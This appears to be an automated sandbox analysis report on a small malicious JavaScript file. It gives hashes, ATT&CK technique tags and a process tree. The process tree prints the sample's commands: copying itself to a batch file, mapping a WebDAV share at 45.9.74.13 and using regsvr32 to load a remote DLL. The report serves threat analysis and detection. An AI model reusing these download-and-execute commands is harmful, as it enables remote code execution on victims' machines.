831787167fa7b93954060c9763109bfd5376ab4ec230c9f137882fc13632302e

Analysis

max time kernel
120s
max time network
121s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
08/07/2024, 23:52

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

21283210661733921034.js
Size

5KB
MD5

767379745b0e117a97d7fa84a634761c
SHA1

57b0715aa84c2b099d6e8c3ddae65b569198a7ff
SHA256

831787167fa7b93954060c9763109bfd5376ab4ec230c9f137882fc13632302e
SHA512

a805986f7e6be508dc4dfb4367d5c0f2d35f5e292a251184174078ff2f46c6f5e5903ebc665a51fe8a78dfc45adf02be0626b22837a94f23adca7b04c177abca
SSDEEP

48:EKM01B7XZ4nBhBQD4X7P7P7p74X7P7P7bVq8JEpyaYDJsZ98SKVKHDDmATHB/r2u:xBbc6qjyfWZ99KYmA6sAxhzWrkze

Score

3^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Runs net.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
1284	regsvr32.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 2808 wrote to memory of 2692	2808	wscript.exe	29
PID 2808 wrote to memory of 2692	2808	wscript.exe	29
PID 2808 wrote to memory of 2692	2808	wscript.exe	29
PID 2692 wrote to memory of 2916	2692	cmd.exe	31
PID 2692 wrote to memory of 2916	2692	cmd.exe	31
PID 2692 wrote to memory of 2916	2692	cmd.exe	31
PID 2692 wrote to memory of 1284	2692	cmd.exe	32
PID 2692 wrote to memory of 1284	2692	cmd.exe	32
PID 2692 wrote to memory of 1284	2692	cmd.exe	32
PID 2692 wrote to memory of 1284	2692	cmd.exe	32
PID 2692 wrote to memory of 1284	2692	cmd.exe	32

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\21283210661733921034.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2808
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\21283210661733921034.js" "C:\Users\Admin\\prkunq.bat" && "C:\Users\Admin\\prkunq.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2692
- - C:\Windows\system32\net.exe
    net use \\45.9.74.13@8888\DavWWWRoot\
    3⤵
    PID:2916
- - C:\Windows\system32\regsvr32.exe
    regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\101.dll
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1284

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\prkunq.bat

Filesize
5KB

MD5
767379745b0e117a97d7fa84a634761c

SHA1
57b0715aa84c2b099d6e8c3ddae65b569198a7ff

SHA256
831787167fa7b93954060c9763109bfd5376ab4ec230c9f137882fc13632302e

SHA512
a805986f7e6be508dc4dfb4367d5c0f2d35f5e292a251184174078ff2f46c6f5e5903ebc665a51fe8a78dfc45adf02be0626b22837a94f23adca7b04c177abca

Download Submit